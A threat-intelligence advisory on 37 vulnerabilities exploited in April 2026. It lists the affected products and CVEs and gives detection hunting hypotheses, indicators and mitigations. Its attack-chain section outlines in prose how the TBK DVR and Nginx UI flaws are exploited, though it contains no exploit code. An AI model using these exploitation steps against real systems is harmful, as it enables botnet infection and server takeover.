April 2026 CVE Landscape

What Happened

In April 2026, security researchers observed attackers actively exploiting 37 different software vulnerabilities. These flaws affect a wide range of enterprise software, including Microsoft products, Nginx UI, and TBK digital video recorders. This matters because attackers are using these weaknesses to deploy ransomware and take over systems to build botnets. Organizations should immediately review the list of exploited vulnerabilities and apply the necessary software updates to protect their networks.

Key Takeaways

• Insikt Group identified 37 high-impact vulnerabilities actively exploited in April 2026, with 31 listed in CISA's KEV catalog.
• Seven vulnerabilities were linked to ransomware operations, including Storm-1175's Medusa and Sorry Ransomware.
• CVE-2024-3721 in TBK DVR devices is being actively exploited to deliver the Mirai-based Nexcorium botnet.
• CVE-2026-33032, a missing authentication flaw in Nginx UI, allows unauthenticated remote attackers to achieve complete service takeover.

Affected Systems

• Microsoft Office, Exchange, Windows Server, SharePoint, Defender
• Adobe Acrobat and Acrobat Reader
• TBK DVR-4104 and DVR-4216 systems
• Nginx UI (version 2.3.3 and earlier)
• Fortinet FortiClient EMS
• Cisco Catalyst SD-WAN Manager
• Ivanti Endpoint Manager Mobile
• ConnectWise ScreenConnect
• JetBrains TeamCity On-Premises

Vulnerabilities (CVEs)

• CVE-2009-0238
• CVE-2012-1854
• CVE-2020-9715
• CVE-2023-21529
• CVE-2023-27351
• CVE-2023-36424
• CVE-2024-1708
• CVE-2024-27199
• CVE-2024-3721
• CVE-2024-57726
• CVE-2024-57728
• CVE-2024-7399
• CVE-2025-2749
• CVE-2025-29635
• CVE-2025-32975
• CVE-2025-48700
• CVE-2025-60710
• CVE-2026-1340
• CVE-2026-20122
• CVE-2026-20128
• CVE-2026-20133
• CVE-2026-21643
• CVE-2026-32201
• CVE-2026-32202
• CVE-2026-33032
• CVE-2026-33825
• CVE-2026-34197
• CVE-2026-34621
• CVE-2026-3502
• CVE-2026-35616
• CVE-2026-39987
• CVE-2026-41940
• CVE-2026-5281

Attack Chain

Threat actors exploit CVE-2024-3721 in TBK DVR devices via crafted requests to the mdb and mdc arguments, dropping a downloader script named 'dvr'. This script retrieves Nexcorium botnet binaries, modifies their permissions to 777, and executes them. Separately, attackers exploit CVE-2026-33032 in Nginx UI by sending unauthenticated JSON-RPC requests to the /mcpmessage endpoint, bypassing IP allowlists to invoke MCP tools that overwrite Nginx configuration files and trigger service reloads.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: Yes
• Platforms: Nuclei

Recorded Future's Insikt Group has created Nuclei templates to detect the missing authentication vulnerabilities in Nginx UI (CVE-2026-33032) and Marimo (CVE-2026-39987).

Detection Engineering Assessment

EDR Visibility: Medium — EDR can detect the execution of the 'dvr' script and subsequent 'nexuscorp' binaries on supported OSes, as well as the chmod 777 commands. However, visibility into IoT devices like TBK DVRs is typically non-existent. Network Visibility: High — Network sensors can detect the specific HTTP headers (X-Hacked-By) and JSON-RPC requests to the /mcpmessage endpoint. Detection Difficulty: Moderate — While network signatures for the exploits are straightforward, the diversity of the 37 CVEs and lack of EDR on IoT devices complicates comprehensive detection.

Required Log Sources

• Web Server Access Logs
• Process Creation Logs
• Network Flow Logs

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Consider hunting for HTTP requests containing the 'X-Hacked-By' header with the value 'Nexus Team - Exploited By Erratic' targeting edge devices.	Web Server Access Logs, Network Flow Logs	Initial Access	Low
If you have visibility into Nginx UI traffic, consider hunting for unauthenticated POST requests to the /mcpmessage endpoint containing JSON-RPC method calls like 'tools/call'.	Web Server Access Logs	Execution	Low
Consider hunting for process execution events where a script named 'dvr' downloads and executes files with the prefix 'nexuscorp' after changing permissions to 777.	Process Creation Logs	Execution	Low

Control Gaps

• Lack of EDR deployment on IoT/DVR devices
• Insufficient network segmentation for management interfaces like Nginx UI

Key Behavioral Indicators

• HTTP header 'X-Hacked-By: Nexus Team - Exploited By Erratic'
• Requests to /mcpmessage endpoint in Nginx UI without Authorization headers
• Execution of chmod 777 on newly downloaded binaries in edge devices

False Positive Assessment

• Low

Recommendations

Immediate Mitigation

• Verify against your organization's incident response runbook and team escalation paths before acting.
• Consider applying vendor-supplied patches for the 37 identified vulnerabilities, prioritizing those listed in the CISA KEV catalog.
• Evaluate whether Nginx UI instances can be updated to version 2.3.4 or later to remediate CVE-2026-33032.

Infrastructure Hardening

• Consider restricting access to management interfaces like Nginx UI to trusted internal IP addresses or VPNs.
• If applicable, evaluate network segmentation policies to isolate IoT devices like TBK DVRs from critical enterprise networks.

User Protection

• Consider implementing strict access controls and monitoring for remote support tools like ConnectWise ScreenConnect and SimpleHelp.

Security Awareness

• Consider updating vulnerability management training to emphasize the rapid exploitation timelines (as fast as two days) observed for recent CVEs.

MITRE ATT&CK Mapping

• T1190 - Exploit Public-Facing Application
• T1059.004 - Command and Scripting Interpreter: Unix Shell
• T1222.002 - File and Directory Permissions Modification: Linux and Mac
• T1562.001 - Impair Defenses: Disable or Modify Tools

Additional IOCs

• Command Lines:
  • Purpose: Modify permissions of downloaded botnet binaries to make them executable | Tools: chmod | Stage: Execution | chmod 777